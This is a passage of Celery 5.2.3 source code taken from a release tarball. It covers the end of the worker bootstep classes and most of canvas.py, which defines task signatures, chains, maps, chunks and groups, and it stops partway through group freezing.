instantiate(self, name, *args, **kwargs): return instantiate(name, *args, **kwargs) def _should_include(self, parent): if self.include_if(parent): return True, self.create(parent) return False, None def include(self, parent): return self._should_include(parent)[0] def create(self, parent): """Create the step.""" def __repr__(self): return f'' @property def alias(self): return self.label or _label(self) def info(self, obj): pass class StartStopStep(Step): """Bootstep that must be started and stopped in order.""" #: Optional obj created by the :meth:`create` method. #: This is used by :class:`StartStopStep` to keep the #: original service object. obj = None def start(self, parent): if self.obj: return self.obj.start() def stop(self, parent): if self.obj: return self.obj.stop() def close(self, parent): pass def terminate(self, parent): if self.obj: return getattr(self.obj, 'terminate', self.obj.stop)() def include(self, parent): inc, ret = self._should_include(parent) if inc: self.obj = ret parent.steps.append(self) return inc class ConsumerStep(StartStopStep): """Bootstep that starts a message consumer.""" requires = ('celery.worker.consumer:Connection',) consumers = None def get_consumers(self, channel): raise NotImplementedError('missing get_consumers') def start(self, c): channel = c.connection.channel() self.consumers = self.get_consumers(channel) for consumer in self.consumers or []: consumer.consume() def stop(self, c): self._close(c, True) def shutdown(self, c): self._close(c, False) def _close(self, c, cancel_consumers=True): channels = set() for consumer in self.consumers or []: if cancel_consumers: ignore_errors(c.connection, consumer.cancel) if consumer.channel: channels.add(consumer.channel) for channel in channels: ignore_errors(c.connection, channel.close) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/celery/canvas.py0000664000175000017500000017346700000000000016027 0ustar00asifasif00000000000000"""Composing task work-flows. .. seealso: You should import these from :mod:`celery` and not this module. """ import itertools import operator from collections import deque from collections.abc import MutableSequence from copy import deepcopy from functools import partial as _partial from functools import reduce from operator import itemgetter from types import GeneratorType from kombu.utils.functional import fxrange, reprcall from kombu.utils.objects import cached_property from kombu.utils.uuid import uuid from vine import barrier from celery._state import current_app from celery.result import GroupResult, allow_join_result from celery.utils import abstract from celery.utils.collections import ChainMap from celery.utils.functional import _regen from celery.utils.functional import chunks as _chunks from celery.utils.functional import (is_list, lookahead, maybe_list, regen, seq_concat_item, seq_concat_seq) from celery.utils.objects import getitem_property from celery.utils.text import remove_repeating_from_task, truncate __all__ = ( 'Signature', 'chain', 'xmap', 'xstarmap', 'chunks', 'group', 'chord', 'signature', 'maybe_signature', ) def maybe_unroll_group(group): """Unroll group with only one member.""" # Issue #1656 try: size = len(group.tasks) except TypeError: try: size = group.tasks.__length_hint__() except (AttributeError, TypeError): return group else: return list(group.tasks)[0] if size == 1 else group else: return group.tasks[0] if size == 1 else group def task_name_from(task): return getattr(task, 'name', task) @abstract.CallableSignature.register class Signature(dict): """Task Signature. Class that wraps the arguments and execution options for a single task invocation. Used as the parts in a :class:`group` and other constructs, or to pass tasks around as callbacks while being compatible with serializers with a strict type subset. Signatures can also be created from tasks: - Using the ``.signature()`` method that has the same signature as ``Task.apply_async``: .. code-block:: pycon >>> add.signature(args=(1,), kwargs={'kw': 2}, options={}) - or the ``.s()`` shortcut that works for star arguments: .. code-block:: pycon >>> add.s(1, kw=2) - the ``.s()`` shortcut does not allow you to specify execution options but there's a chaning `.set` method that returns the signature: .. code-block:: pycon >>> add.s(2, 2).set(countdown=10).set(expires=30).delay() Note: You should use :func:`~celery.signature` to create new signatures. The ``Signature`` class is the type returned by that function and should be used for ``isinstance`` checks for signatures. See Also: :ref:`guide-canvas` for the complete guide. Arguments: task (Union[Type[celery.app.task.Task], str]): Either a task class/instance, or the name of a task. args (Tuple): Positional arguments to apply. kwargs (Dict): Keyword arguments to apply. options (Dict): Additional options to :meth:`Task.apply_async`. Note: If the first argument is a :class:`dict`, the other arguments will be ignored and the values in the dict will be used instead:: >>> s = signature('tasks.add', args=(2, 2)) >>> signature(s) {'task': 'tasks.add', args=(2, 2), kwargs={}, options={}} """ TYPES = {} _app = _type = None # The following fields must not be changed during freezing/merging because # to do so would disrupt completion of parent tasks _IMMUTABLE_OPTIONS = {"group_id"} @classmethod def register_type(cls, name=None): def _inner(subclass): cls.TYPES[name or subclass.__name__] = subclass return subclass return _inner @classmethod def from_dict(cls, d, app=None): typ = d.get('subtask_type') if typ: target_cls = cls.TYPES[typ] if target_cls is not cls: return target_cls.from_dict(d, app=app) return Signature(d, app=app) def __init__(self, task=None, args=None, kwargs=None, options=None, type=None, subtask_type=None, immutable=False, app=None, **ex): self._app = app if isinstance(task, dict): super().__init__(task) # works like dict(d) else: # Also supports using task class/instance instead of string name. try: task_name = task.name except AttributeError: task_name = task else: self._type = task super().__init__( task=task_name, args=tuple(args or ()), kwargs=kwargs or {}, options=dict(options or {}, **ex), subtask_type=subtask_type, immutable=immutable, ) def __call__(self, *partial_args, **partial_kwargs): """Call the task directly (in the current process).""" args, kwargs, _ = self._merge(partial_args, partial_kwargs, None) return self.type(*args, **kwargs) def delay(self, *partial_args, **partial_kwargs): """Shortcut to :meth:`apply_async` using star arguments.""" return self.apply_async(partial_args, partial_kwargs) def apply(self, args=None, kwargs=None, **options): """Call task locally. Same as :meth:`apply_async` but executed the task inline instead of sending a task message. """ args = args if args else () kwargs = kwargs if kwargs else {} # Extra options set to None are dismissed options = {k: v for k, v in options.items() if v is not None} # For callbacks: extra args are prepended to the stored args. args, kwargs, options = self._merge(args, kwargs, options) return self.type.apply(args, kwargs, **options) def apply_async(self, args=None, kwargs=None, route_name=None, **options): """Apply this task asynchronously. Arguments: args (Tuple): Partial args to be prepended to the existing args. kwargs (Dict): Partial kwargs to be merged with existing kwargs. options (Dict): Partial options to be merged with existing options. Returns: ~@AsyncResult: promise of future evaluation. See also: :meth:`~@Task.apply_async` and the :ref:`guide-calling` guide. """ args = args if args else () kwargs = kwargs if kwargs else {} # Extra options set to None are dismissed options = {k: v for k, v in options.items() if v is not None} try: _apply = self._apply_async except IndexError: # pragma: no cover # no tasks for chain, etc to find type return # For callbacks: extra args are prepended to the stored args. if args or kwargs or options: args, kwargs, options = self._merge(args, kwargs, options) else: args, kwargs, options = self.args, self.kwargs, self.options # pylint: disable=too-many-function-args # Borks on this, as it's a property return _apply(args, kwargs, **options) def _merge(self, args=None, kwargs=None, options=None, force=False): args = args if args else () kwargs = kwargs if kwargs else {} if options is not None: # We build a new options dictionary where values in `options` # override values in `self.options` except for keys which are # noted as being immutable (unrelated to signature immutability) # implying that allowing their value to change would stall tasks new_options = dict(self.options, **{ k: v for k, v in options.items() if k not in self._IMMUTABLE_OPTIONS or k not in self.options }) else: new_options = self.options if self.immutable and not force: return (self.args, self.kwargs, new_options) return (tuple(args) + tuple(self.args) if args else self.args, dict(self.kwargs, **kwargs) if kwargs else self.kwargs, new_options) def clone(self, args=None, kwargs=None, **opts): """Create a copy of this signature. Arguments: args (Tuple): Partial args to be prepended to the existing args. kwargs (Dict): Partial kwargs to be merged with existing kwargs. options (Dict): Partial options to be merged with existing options. """ args = args if args else () kwargs = kwargs if kwargs else {} # need to deepcopy options so origins links etc. is not modified. if args or kwargs or opts: args, kwargs, opts = self._merge(args, kwargs, opts) else: args, kwargs, opts = self.args, self.kwargs, self.options signature = Signature.from_dict({'task': self.task, 'args': tuple(args), 'kwargs': kwargs, 'options': deepcopy(opts), 'subtask_type': self.subtask_type, 'immutable': self.immutable}, app=self._app) signature._type = self._type return signature partial = clone def freeze(self, _id=None, group_id=None, chord=None, root_id=None, parent_id=None, group_index=None): """Finalize the signature by adding a concrete task id. The task won't be called and you shouldn't call the signature twice after freezing it as that'll result in two task messages using the same task id. Returns: ~@AsyncResult: promise of future evaluation. """ # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. opts = self.options try: # if there is already an id for this task, return it tid = opts['task_id'] except KeyError: # otherwise, use the _id sent to this function, falling back on a generated UUID tid = opts['task_id'] = _id or uuid() if root_id: opts['root_id'] = root_id if parent_id: opts['parent_id'] = parent_id if 'reply_to' not in opts: # fall back on unique ID for this thread in the app opts['reply_to'] = self.app.thread_oid if group_id and "group_id" not in opts: opts['group_id'] = group_id if chord: opts['chord'] = chord if group_index is not None: opts['group_index'] = group_index # pylint: disable=too-many-function-args # Borks on this, as it's a property. return self.AsyncResult(tid) _freeze = freeze def replace(self, args=None, kwargs=None, options=None): """Replace the args, kwargs or options set for this signature. These are only replaced if the argument for the section is not :const:`None`. """ signature = self.clone() if args is not None: signature.args = args if kwargs is not None: signature.kwargs = kwargs if options is not None: signature.options = options return signature def set(self, immutable=None, **options): """Set arbitrary execution options (same as ``.options.update(…)``). Returns: Signature: This is a chaining method call (i.e., it will return ``self``). """ if immutable is not None: self.set_immutable(immutable) self.options.update(options) return self def set_immutable(self, immutable): self.immutable = immutable def _with_list_option(self, key): items = self.options.setdefault(key, []) if not isinstance(items, MutableSequence): items = self.options[key] = [items] return items def append_to_list_option(self, key, value): items = self._with_list_option(key) if value not in items: items.append(value) return value def extend_list_option(self, key, value): items = self._with_list_option(key) items.extend(maybe_list(value)) def link(self, callback): """Add callback task to be applied if this task succeeds. Returns: Signature: the argument passed, for chaining or use with :func:`~functools.reduce`. """ return self.append_to_list_option('link', callback) def link_error(self, errback): """Add callback task to be applied on error in task execution. Returns: Signature: the argument passed, for chaining or use with :func:`~functools.reduce`. """ return self.append_to_list_option('link_error', errback) def on_error(self, errback): """Version of :meth:`link_error` that supports chaining. on_error chains the original signature, not the errback so:: >>> add.s(2, 2).on_error(errback.s()).delay() calls the ``add`` task, not the ``errback`` task, but the reverse is true for :meth:`link_error`. """ self.link_error(errback) return self def flatten_links(self): """Return a recursive list of dependencies. "unchain" if you will, but with links intact. """ return list(itertools.chain.from_iterable(itertools.chain( [[self]], (link.flatten_links() for link in maybe_list(self.options.get('link')) or []) ))) def __or__(self, other): if isinstance(other, _chain): # task | chain -> chain return _chain(seq_concat_seq( (self,), other.unchain_tasks()), app=self._app) elif isinstance(other, group): # unroll group with one member other = maybe_unroll_group(other) # task | group() -> chain return _chain(self, other, app=self.app) elif isinstance(other, Signature): # task | task -> chain return _chain(self, other, app=self._app) return NotImplemented def __ior__(self, other): # Python 3.9 introduces | as the merge operator for dicts. # We override the in-place version of that operator # so that canvases continue to work as they did before. return self.__or__(other) def election(self): type = self.type app = type.app tid = self.options.get('task_id') or uuid() with app.producer_or_acquire(None) as producer: props = type.backend.on_task_call(producer, tid) app.control.election(tid, 'task', self.clone(task_id=tid, **props), connection=producer.connection) return type.AsyncResult(tid) def reprcall(self, *args, **kwargs): args, kwargs, _ = self._merge(args, kwargs, {}, force=True) return reprcall(self['task'], args, kwargs) def __deepcopy__(self, memo): memo[id(self)] = self return dict(self) def __invert__(self): return self.apply_async().get() def __reduce__(self): # for serialization, the task type is lazily loaded, # and not stored in the dict itself. return signature, (dict(self),) def __json__(self): return dict(self) def __repr__(self): return self.reprcall() def items(self): for k, v in super().items(): yield k.decode() if isinstance(k, bytes) else k, v @property def name(self): # for duck typing compatibility with Task.name return self.task @cached_property def type(self): return self._type or self.app.tasks[self['task']] @cached_property def app(self): return self._app or current_app @cached_property def AsyncResult(self): try: return self.type.AsyncResult except KeyError: # task not registered return self.app.AsyncResult @cached_property def _apply_async(self): try: return self.type.apply_async except KeyError: return _partial(self.app.send_task, self['task']) id = getitem_property('options.task_id', 'Task UUID') parent_id = getitem_property('options.parent_id', 'Task parent UUID.') root_id = getitem_property('options.root_id', 'Task root UUID.') task = getitem_property('task', 'Name of task.') args = getitem_property('args', 'Positional arguments to task.') kwargs = getitem_property('kwargs', 'Keyword arguments to task.') options = getitem_property('options', 'Task execution options.') subtask_type = getitem_property('subtask_type', 'Type of signature') immutable = getitem_property( 'immutable', 'Flag set if no longer accepts new arguments') def _prepare_chain_from_options(options, tasks, use_link): # When we publish groups we reuse the same options dictionary for all of # the tasks in the group. See: # https://github.com/celery/celery/blob/fb37cb0b8/celery/canvas.py#L1022. # Issue #5354 reported that the following type of canvases # causes a Celery worker to hang: # group( # add.s(1, 1), # add.s(1, 1) # ) | tsum.s() | add.s(1) | group(add.s(1), add.s(1)) # The resolution of #5354 in PR #5681 was to only set the `chain` key # in the options dictionary if it is not present. # Otherwise we extend the existing list of tasks in the chain with the new # tasks: options['chain'].extend(chain_). # Before PR #5681 we overrode the `chain` key in each iteration # of the loop which applies all the tasks in the group: # options['chain'] = tasks if not use_link else None # This caused Celery to execute chains correctly in most cases since # in each iteration the `chain` key would reset itself to a new value # and the side effect of mutating the key did not propagate # to the next task in the group. # Since we now mutated the `chain` key, a *list* which is passed # by *reference*, the next task in the group will extend the list # of tasks in the chain instead of setting a new one from the chain_ # variable above. # This causes Celery to execute a chain, even though there might not be # one to begin with. Alternatively, it causes Celery to execute more tasks # that were previously present in the previous task in the group. # The solution is to be careful and never mutate the options dictionary # to begin with. # Here is an example of a canvas which triggers this issue: # add.s(5, 6) | group((add.s(1) | add.s(2), add.s(3))). # The expected result is [14, 14]. However, when we extend the `chain` # key the `add.s(3)` task erroneously has `add.s(2)` in its chain since # it was previously applied to `add.s(1)`. # Without being careful not to mutate the options dictionary, the result # in this case is [16, 14]. # To avoid deep-copying the entire options dictionary every single time we # run a chain we use a ChainMap and ensure that we never mutate # the original `chain` key, hence we use list_a + list_b to create a new # list. if use_link: return ChainMap({'chain': None}, options) elif 'chain' not in options: return ChainMap({'chain': tasks}, options) elif tasks is not None: # chain option may already be set, resulting in # "multiple values for keyword argument 'chain'" error. # Issue #3379. # If a chain already exists, we need to extend it with the next # tasks in the chain. # Issue #5354. # WARNING: Be careful not to mutate `options['chain']`. return ChainMap({'chain': options['chain'] + tasks}, options) @Signature.register_type(name='chain') class _chain(Signature): tasks = getitem_property('kwargs.tasks', 'Tasks in chain.') @classmethod def from_dict(cls, d, app=None): tasks = d['kwargs']['tasks'] if tasks: if isinstance(tasks, tuple): # aaaargh tasks = d['kwargs']['tasks'] = list(tasks) tasks = [maybe_signature(task, app=app) for task in tasks] return _chain(tasks, app=app, **d['options']) def __init__(self, *tasks, **options): tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0]) else tasks) super().__init__('celery.chain', (), {'tasks': tasks}, **options ) self._use_link = options.pop('use_link', None) self.subtask_type = 'chain' self._frozen = None def __call__(self, *args, **kwargs): if self.tasks: return self.apply_async(args, kwargs) def __or__(self, other): if isinstance(other, group): # unroll group with one member other = maybe_unroll_group(other) # chain | group() -> chain tasks = self.unchain_tasks() if not tasks: # If the chain is empty, return the group return other return _chain(seq_concat_item( tasks, other), app=self._app) elif isinstance(other, _chain): # chain | chain -> chain return _chain(seq_concat_seq( self.unchain_tasks(), other.unchain_tasks()), app=self._app) elif isinstance(other, Signature): if self.tasks and isinstance(self.tasks[-1], group): # CHAIN [last item is group] | TASK -> chord sig = self.clone() sig.tasks[-1] = chord( sig.tasks[-1], other, app=self._app) return sig elif self.tasks and isinstance(self.tasks[-1], chord): # CHAIN [last item is chord] -> chain with chord body. sig = self.clone() sig.tasks[-1].body = sig.tasks[-1].body | other return sig else: # chain | task -> chain return _chain(seq_concat_item( self.unchain_tasks(), other), app=self._app) else: return NotImplemented def clone(self, *args, **kwargs): to_signature = maybe_signature signature = super().clone(*args, **kwargs) signature.kwargs['tasks'] = [ to_signature(sig, app=self._app, clone=True) for sig in signature.kwargs['tasks'] ] return signature def unchain_tasks(self): # Clone chain's tasks assigning signatures from link_error # to each task tasks = [t.clone() for t in self.tasks] for sig in self.options.get('link_error', []): for task in tasks: task.link_error(sig) return tasks def apply_async(self, args=None, kwargs=None, **options): # python is best at unpacking kwargs, so .run is here to do that. args = args if args else () kwargs = kwargs if kwargs else [] app = self.app if app.conf.task_always_eager: with allow_join_result(): return self.apply(args, kwargs, **options) return self.run(args, kwargs, app=app, **( dict(self.options, **options) if options else self.options)) def run(self, args=None, kwargs=None, group_id=None, chord=None, task_id=None, link=None, link_error=None, publisher=None, producer=None, root_id=None, parent_id=None, app=None, group_index=None, **options): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. args = args if args else () kwargs = kwargs if kwargs else [] app = app or self.app use_link = self._use_link if use_link is None and app.conf.task_protocol == 1: use_link = True args = (tuple(args) + tuple(self.args) if args and not self.immutable else self.args) tasks, results_from_prepare = self.prepare_steps( args, kwargs, self.tasks, root_id, parent_id, link_error, app, task_id, group_id, chord, group_index=group_index, ) if results_from_prepare: if link: tasks[0].extend_list_option('link', link) first_task = tasks.pop() options = _prepare_chain_from_options(options, tasks, use_link) result_from_apply = first_task.apply_async(**options) # If we only have a single task, it may be important that we pass # the real result object rather than the one obtained via freezing. # e.g. For `GroupResult`s, we need to pass back the result object # which will actually have its promise fulfilled by the subtasks, # something that will never occur for the frozen result. if not tasks: return result_from_apply else: return results_from_prepare[0] # in order for a chain to be frozen, each of the members of the chain individually needs to be frozen # TODO figure out why we are always cloning before freeze def freeze(self, _id=None, group_id=None, chord=None, root_id=None, parent_id=None, group_index=None): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. _, results = self._frozen = self.prepare_steps( self.args, self.kwargs, self.tasks, root_id, parent_id, None, self.app, _id, group_id, chord, clone=False, group_index=group_index, ) return results[0] def prepare_steps(self, args, kwargs, tasks, root_id=None, parent_id=None, link_error=None, app=None, last_task_id=None, group_id=None, chord_body=None, clone=True, from_dict=Signature.from_dict, group_index=None): app = app or self.app # use chain message field for protocol 2 and later. # this avoids pickle blowing the stack on the recursion # required by linking task together in a tree structure. # (why is pickle using recursion? or better yet why cannot python # do tail call optimization making recursion actually useful?) use_link = self._use_link if use_link is None and app.conf.task_protocol == 1: use_link = True steps = deque(tasks) # optimization: now the pop func is a local variable steps_pop = steps.pop steps_extend = steps.extend prev_task = None prev_res = None tasks, results = [], [] i = 0 # NOTE: We are doing this in reverse order. # The result is a list of tasks in reverse order, that is # passed as the ``chain`` message field. # As it's reversed the worker can just do ``chain.pop()`` to # get the next task in the chain. while steps: task = steps_pop() # if steps is not empty, this is the first task - reverse order # if i = 0, this is the last task - again, because we're reversed is_first_task, is_last_task = not steps, not i if not isinstance(task, abstract.CallableSignature): task = from_dict(task, app=app) if isinstance(task, group): # when groups are nested, they are unrolled - all tasks within # groups within groups should be called in parallel task = maybe_unroll_group(task) # first task gets partial args from chain if clone: if is_first_task: task = task.clone(args, kwargs) else: task = task.clone() elif is_first_task: task.args = tuple(args) + tuple(task.args) if isinstance(task, _chain): # splice (unroll) the chain steps_extend(task.tasks) continue # TODO why isn't this asserting is_last_task == False? if isinstance(task, group) and prev_task: # automatically upgrade group(...) | s to chord(group, s) # for chords we freeze by pretending it's a normal # signature instead of a group. tasks.pop() results.pop() try: task = chord( task, body=prev_task, task_id=prev_res.task_id, root_id=root_id, app=app, ) except AttributeError: # A GroupResult does not have a task_id since it consists # of multiple tasks. # We therefore, have to construct the chord without it. # Issues #5467, #3585. task = chord( task, body=prev_task, root_id=root_id, app=app, ) if is_last_task: # chain(task_id=id) means task id is set for the last task # in the chain. If the chord is part of a chord/group # then that chord/group must synchronize based on the # last task in the chain, so we only set the group_id and # chord callback for the last task. res = task.freeze( last_task_id, root_id=root_id, group_id=group_id, chord=chord_body, group_index=group_index, ) else: res = task.freeze(root_id=root_id) i += 1 if prev_task: if use_link: # link previous task to this task. task.link(prev_task) if prev_res and not prev_res.parent: prev_res.parent = res if link_error: for errback in maybe_list(link_error): task.link_error(errback) tasks.append(task) results.append(res) prev_task, prev_res = task, res if isinstance(task, chord): app.backend.ensure_chords_allowed() # If the task is a chord, and the body is a chain # the chain has already been prepared, and res is # set to the last task in the callback chain. # We need to change that so that it points to the # group result object. node = res while node.parent: node = node.parent prev_res = node return tasks, results def apply(self, args=None, kwargs=None, **options): args = args if args else () kwargs = kwargs if kwargs else {} last, (fargs, fkwargs) = None, (args, kwargs) for task in self.tasks: res = task.clone(fargs, fkwargs).apply( last and (last.get(),), **dict(self.options, **options)) res.parent, last, (fargs, fkwargs) = last, res, (None, None) return last @property def app(self): app = self._app if app is None: try: app = self.tasks[0]._app except LookupError: pass return app or current_app def __repr__(self): if not self.tasks: return f'<{type(self).__name__}@{id(self):#x}: empty>' return remove_repeating_from_task( self.tasks[0]['task'], ' | '.join(repr(t) for t in self.tasks)) class chain(_chain): """Chain tasks together. Each tasks follows one another, by being applied as a callback of the previous task. Note: If called with only one argument, then that argument must be an iterable of tasks to chain: this allows us to use generator expressions. Example: This is effectively :math:`((2 + 2) + 4)`: .. code-block:: pycon >>> res = chain(add.s(2, 2), add.s(4))() >>> res.get() 8 Calling a chain will return the result of the last task in the chain. You can get to the other tasks by following the ``result.parent``'s: .. code-block:: pycon >>> res.parent.get() 4 Using a generator expression: .. code-block:: pycon >>> lazy_chain = chain(add.s(i) for i in range(10)) >>> res = lazy_chain(3) Arguments: *tasks (Signature): List of task signatures to chain. If only one argument is passed and that argument is an iterable, then that'll be used as the list of signatures to chain instead. This means that you can use a generator expression. Returns: ~celery.chain: A lazy signature that can be called to apply the first task in the chain. When that task succeeds the next task in the chain is applied, and so on. """ # could be function, but must be able to reference as :class:`chain`. def __new__(cls, *tasks, **kwargs): # This forces `chain(X, Y, Z)` to work the same way as `X | Y | Z` if not kwargs and tasks: if len(tasks) != 1 or is_list(tasks[0]): tasks = tasks[0] if len(tasks) == 1 else tasks # if is_list(tasks) and len(tasks) == 1: # return super(chain, cls).__new__(cls, tasks, **kwargs) return reduce(operator.or_, tasks, chain()) return super().__new__(cls, *tasks, **kwargs) class _basemap(Signature): _task_name = None _unpack_args = itemgetter('task', 'it') @classmethod def from_dict(cls, d, app=None): return cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']) def __init__(self, task, it, **options): super().__init__(self._task_name, (), {'task': task, 'it': regen(it)}, immutable=True, **options ) def apply_async(self, args=None, kwargs=None, **opts): # need to evaluate generators args = args if args else () kwargs = kwargs if kwargs else {} task, it = self._unpack_args(self.kwargs) return self.type.apply_async( (), {'task': task, 'it': list(it)}, route_name=task_name_from(self.kwargs.get('task')), **opts ) @Signature.register_type() class xmap(_basemap): """Map operation for tasks. Note: Tasks executed sequentially in process, this is not a parallel operation like :class:`group`. """ _task_name = 'celery.map' def __repr__(self): task, it = self._unpack_args(self.kwargs) return f'[{task.task}(x) for x in {truncate(repr(it), 100)}]' @Signature.register_type() class xstarmap(_basemap): """Map operation for tasks, using star arguments.""" _task_name = 'celery.starmap' def __repr__(self): task, it = self._unpack_args(self.kwargs) return f'[{task.task}(*x) for x in {truncate(repr(it), 100)}]' @Signature.register_type() class chunks(Signature): """Partition of tasks into chunks of size n.""" _unpack_args = itemgetter('task', 'it', 'n') @classmethod def from_dict(cls, d, app=None): return chunks(*cls._unpack_args(d['kwargs']), app=app, **d['options']) def __init__(self, task, it, n, **options): super().__init__('celery.chunks', (), {'task': task, 'it': regen(it), 'n': n}, immutable=True, **options ) def __call__(self, **options): return self.apply_async(**options) def apply_async(self, args=None, kwargs=None, **opts): args = args if args else () kwargs = kwargs if kwargs else {} return self.group().apply_async( args, kwargs, route_name=task_name_from(self.kwargs.get('task')), **opts ) def group(self): # need to evaluate generators task, it, n = self._unpack_args(self.kwargs) return group((xstarmap(task, part, app=self._app) for part in _chunks(iter(it), n)), app=self._app) @classmethod def apply_chunks(cls, task, it, n, app=None): return cls(task, it, n, app=app)() def _maybe_group(tasks, app): if isinstance(tasks, dict): tasks = signature(tasks, app=app) if isinstance(tasks, (group, _chain)): tasks = tasks.tasks elif isinstance(tasks, abstract.CallableSignature): tasks = [tasks] else: if isinstance(tasks, GeneratorType): tasks = regen(signature(t, app=app) for t in tasks) else: tasks = [signature(t, app=app) for t in tasks] return tasks @Signature.register_type() class group(Signature): """Creates a group of tasks to be executed in parallel. A group is lazy so you must call it to take action and evaluate the group. Note: If only one argument is passed, and that argument is an iterable then that'll be used as the list of tasks instead: this allows us to use ``group`` with generator expressions. Example: >>> lazy_group = group([add.s(2, 2), add.s(4, 4)]) >>> promise = lazy_group() # <-- evaluate: returns lazy result. >>> promise.get() # <-- will wait for the task to return [4, 8] Arguments: *tasks (List[Signature]): A list of signatures that this group will call. If there's only one argument, and that argument is an iterable, then that'll define the list of signatures instead. **options (Any): Execution options applied to all tasks in the group. Returns: ~celery.group: signature that when called will then call all of the tasks in the group (and return a :class:`GroupResult` instance that can be used to inspect the state of the group). """ tasks = getitem_property('kwargs.tasks', 'Tasks in group.') @classmethod def from_dict(cls, d, app=None): # We need to mutate the `kwargs` element in place to avoid confusing # `freeze()` implementations which end up here and expect to be able to # access elements from that dictionary later and refer to objects # canonicalized here orig_tasks = d["kwargs"]["tasks"] d["kwargs"]["tasks"] = rebuilt_tasks = type(orig_tasks)( maybe_signature(task, app=app) for task in orig_tasks ) return group(rebuilt_tasks, app=app, **d['options']) def __init__(self, *tasks, **options): if len(tasks) == 1: tasks = tasks[0] if isinstance(tasks, group): tasks = tasks.tasks if isinstance(tasks, abstract.CallableSignature): tasks = [tasks.clone()] if not isinstance(tasks, _regen): tasks = regen(tasks) super().__init__('celery.group', (), {'tasks': tasks}, **options ) self.subtask_type = 'group' def __call__(self, *partial_args, **options): return self.apply_async(partial_args, **options) def __or__(self, other): # group() | task -> chord return chord(self, body=other, app=self._app) def skew(self, start=1.0, stop=None, step=1.0): it = fxrange(start, stop, step, repeatlast=True) for task in self.tasks: task.set(countdown=next(it)) return self def apply_async(self, args=None, kwargs=None, add_to_parent=True, producer=None, link=None, link_error=None, **options): args = args if args else () if link is not None: raise TypeError('Cannot add link to group: use a chord') if link_error is not None: raise TypeError( 'Cannot add link to group: do that on individual tasks') app = self.app if app.conf.task_always_eager: return self.apply(args, kwargs, **options) if not self.tasks: return self.freeze() options, group_id, root_id = self._freeze_gid(options) tasks = self._prepared(self.tasks, [], group_id, root_id, app) p = barrier() results = list(self._apply_tasks(tasks, producer, app, p, args=args, kwargs=kwargs, **options)) result = self.app.GroupResult(group_id, results, ready_barrier=p) p.finalize() # - Special case of group(A.s() | group(B.s(), C.s())) # That is, group with single item that's a chain but the # last task in that chain is a group. # # We cannot actually support arbitrary GroupResults in chains, # but this special case we can. if len(result) == 1 and isinstance(result[0], GroupResult): result = result[0] parent_task = app.current_worker_task if add_to_parent and parent_task: parent_task.add_trail(result) return result def apply(self, args=None, kwargs=None, **options): args = args if args else () kwargs = kwargs if kwargs else {} app = self.app if not self.tasks: return self.freeze() # empty group returns GroupResult options, group_id, root_id = self._freeze_gid(options) tasks = self._prepared(self.tasks, [], group_id, root_id, app) return app.GroupResult(group_id, [ sig.apply(args=args, kwargs=kwargs, **options) for sig, _, _ in tasks ]) def set_immutable(self, immutable): for task in self.tasks: task.set_immutable(immutable) def link(self, sig): # Simply link to first task. Doing this is slightly misleading because # the callback may be executed before all children in the group are # completed and also if any children other than the first one fail. # # The callback signature is cloned and made immutable since it the # first task isn't actually capable of passing the return values of its # siblings to the callback task. sig = sig.clone().set(immutable=True) return self.tasks[0].link(sig) def link_error(self, sig): # Any child task might error so we need to ensure that they are all # capable of calling the linked error signature. This opens the # possibility that the task is called more than once but that's better # than it not being called at all. # # We return a concretised tuple of the signatures actually applied to # each child task signature, of which there might be none! return tuple(child_task.link_error(sig) for child_task in self.tasks) def _prepared(self, tasks, partial_args, group_id, root_id, app, CallableSignature=abstract.CallableSignature, from_dict=Signature.from_dict, isinstance=isinstance, tuple=tuple): for task in tasks: if isinstance(task, CallableSignature): # local sigs are always of type Signature, and we # clone them to make sure we don't modify the originals. task = task.clone() else: # serialized sigs must be converted to Signature. task = from_dict(task, app=app) if isinstance(task, group): # needs yield_from :( unroll = task._prepared( task.tasks, partial_args, group_id, root_id, app, ) yield from unroll else: if partial_args and not task.immutable: task.args = tuple(partial_args) + tuple(task.args) yield task, task.freeze(group_id=group_id, root_id=root_id), group_id def _apply_tasks(self, tasks, producer=None, app=None, p=None, add_to_parent=None, chord=None, args=None, kwargs=None, **options): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. app = app or self.app with app.producer_or_acquire(producer) as producer: # Iterate through tasks two at a time. If tasks is a generator, # we are able to tell when we are at the end by checking if # next_task is None. This enables us to set the chord size # without burning through the entire generator. See #3021. chord_size = 0 for task_index, (current_task, next_task) in enumerate( lookahead(tasks) ): # We expect that each task must be part of the same group which # seems sensible enough. If that's somehow not the case we'll # end up messing up chord counts and there are all sorts of # awful race conditions to think about. We'll hope it's not! sig, res, group_id = current_task chord_obj = chord if chord is not None else sig.options.get("chord") # We need to check the chord size of each contributing task so # that when we get to the final one, we can correctly set the # size in the backend and the chord can be sensible completed. chord_size += _chord._descend(sig) if chord_obj is not None and next_task is None: # Per above, sanity check that we only saw one group app.backend.set_chord_size(group_id, chord_size) sig.apply_async(producer=producer, add_to_parent=False, chord=chord_obj, args=args, kwargs=kwargs, **options) # adding callback to result, such that it will gradually # fulfill the barrier. # # Using barrier.add would use result.then, but we need # to add the weak argument here to only create a weak # reference to the object. if p and not p.cancelled and not p.ready: p.size += 1 res.then(p, weak=True) yield res # <-- r.parent, etc set in the frozen result. def _freeze_gid(self, options): # remove task_id and use that as the group_id, # if we don't remove it then every task will have the same id... options = dict(self.options, **options) options['group_id'] = group_id = ( options.pop('task_id', uuid())) return options, group_id, options.get('root_id') def _freeze_group_tasks(self, _id=None, group_id=None, chord=None, root_id=None, parent_id=None, group_index=None): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. opts = self.options try: gid = opts['task_id'] except KeyError: gid = opts['task_id'] = group_id or uuid() if group_id: opts['group_id'] = group_id if chord: opts['chord'] = chord if group_index is not None: opts['group_index'] = group_index root_id = opts.setdefault('root_id', root_id) parent_id = opts.setdefault('parent_id', parent_id) if isinstance(self.tasks, _regen): # We are draining from a generator here. # tasks1, tasks2 are each a clone of self.tasks tasks1, tasks2 = itertools.tee(self._unroll_tasks(self.tasks)) # freeze each task in tasks1, results now holds AsyncResult for each task results = regen(self._freeze_tasks(tasks1, group_id, chord, root_id, parent_id)) # TODO figure out why this makes sense - # we freeze all tasks in the clone 